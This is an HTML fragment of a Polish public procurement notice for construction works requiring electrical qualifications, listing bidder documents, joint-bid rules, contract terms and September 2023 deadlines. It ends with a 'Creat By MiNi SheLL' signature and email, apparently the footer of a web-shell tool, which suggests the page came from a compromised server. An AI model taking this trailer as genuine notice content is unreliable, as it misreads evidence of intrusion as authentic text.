realizacji, przynajmniej:<br/>a)	jedną osobą, która podczas realizacji zamówienia będzie pełnić funkcję kierownika robót drogowych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>Wyżej wymienione uprawnienia budowlane wymagane na podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (tj. Dz.U. z 2021 r. poz. 2351 ze zm.) <br/>Ilekroć Zamawiający wymaga określonych uprawnień budowlanych na podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (tj. Dz.U. z 2021 r. poz. 2351 ze zm.), rozumie przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. Nr 63, poz. 394). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniach o braku podstaw do wykluczenia - zgodnie z Załącznikiem nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz<br/>oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, o których mowa w pkt III.B.2.SWZ:<br/>a) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty; w zakresie wymaganym w punkcie III.B.2 SWZ – wykaz robót stanowi Załącznik nr 8 do SWZ.<br/>Dowody określające, czy wykazane usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów.<br/>b) Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych – uprawnień niezbędnych do wykonania zamówienia<br/>publicznego, a także doświadczenia zawodowego oraz zakresu wykonywanych przez nie czynności wraz informacją o podstawie do<br/>dysponowania tymi osobami, w zakresie wymaganym w punkcie III.B.1.1.2.a SWZ – wykaz osób stanowi Załącznik nr 10 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wymaga złożenia zdefiniowanego w Systemie formularza oferty o treści zgodnej z założeniami SWZ.<br/>Ponadto wraz z ofertą należy złożyć:<br/>a) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty<br/>budowlane, wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy), o treści zgodnej ze wzorem stanowiącym Załącznik<br/>nr 2 do SWZ.<br/>b) Oświadczenie o podstawach wykluczenia wymienionych w art. 108 ust. 1 pkt 1, 2 i 5 (jeżeli dotyczy) o treści zgodnej ze wzorem stanowiącym Załącznik nr 4 do SWZ.<br/>c) Dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np. pełnomocnictwo, odpis z właściwego<br/>rejestru, np. Krajowego Rejestru Sądowego, informacja o wpisie do Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej Rzeczypospolitej Polskiej lub umowa spółki cywilnej, itp.), zgodnie z obowiązującymi przepisami.<br/>d) Dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe umocowanie,<br/>pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy.<br/>e) Zobowiązanie podmiotów udostępniających zasoby lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>e.1) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniem, o którym mowa w lit. a powyżej, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>f) W przypadku gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa, Wykonawca zobowiązany jest do złożenia wraz z ofertą dowodów, o których mowa w pkt VII B SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> E.	Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. spółka cywilna/konsorcjum)<br/>1.	W przypadku składania oferty przez podmioty występujące wspólnie:<br/>a)	podmioty występujące wspólnie zobowiązane są do ustanowienia w formie pisemnej Pełnomocnika reprezentującego ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>b)	dokument potwierdzający umocowanie do reprezentowania należy dołączyć do oferty w formie oryginału lub cyfrowego odwzorowania pełnomocnictwa sporządzonego w postaci papierowej, poświadczonego zgodnie z obowiązującymi przepisami<br/>W/w dokument powinien zawierać w szczególności wskazanie:<br/>	postępowania o zamówienie publiczne, którego dotyczy,<br/>	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego,<br/>	ustanowionego Pełnomocnika oraz zakresu jego umocowania;<br/>c)	korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu oferty;<br/>d)	Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę podmiotów występujących wspólnie;<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu przesłanek, o których mowa w art. 108 ust. 1 ustawy oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835).<br/>e)	Oświadczenia, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie w zakresie jego dotyczącym. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmianę postanowień umowy według wzoru umowy, stanowiącego Załącznik nr 7 do SWZ, w szczególności: § 8 ust. 2 wzoru umowy<br/>i § 19 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji przedmiotu umowy wynosi 150 dni od dnia podpisania umowy, przy czym termin zakończenia realizacji robót budowlanych wynosi 120 dni od dnia zawarcia umowy.<br/>Przez zakończenie realizacji robót budowlanych objętych przedmiotem umowy, uznaje się faktyczne wykonanie wszystkich robót objętych umową, potwierdzone przez Inspektora Nadzoru Inwestorskiego wpisem do Dziennika Budowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com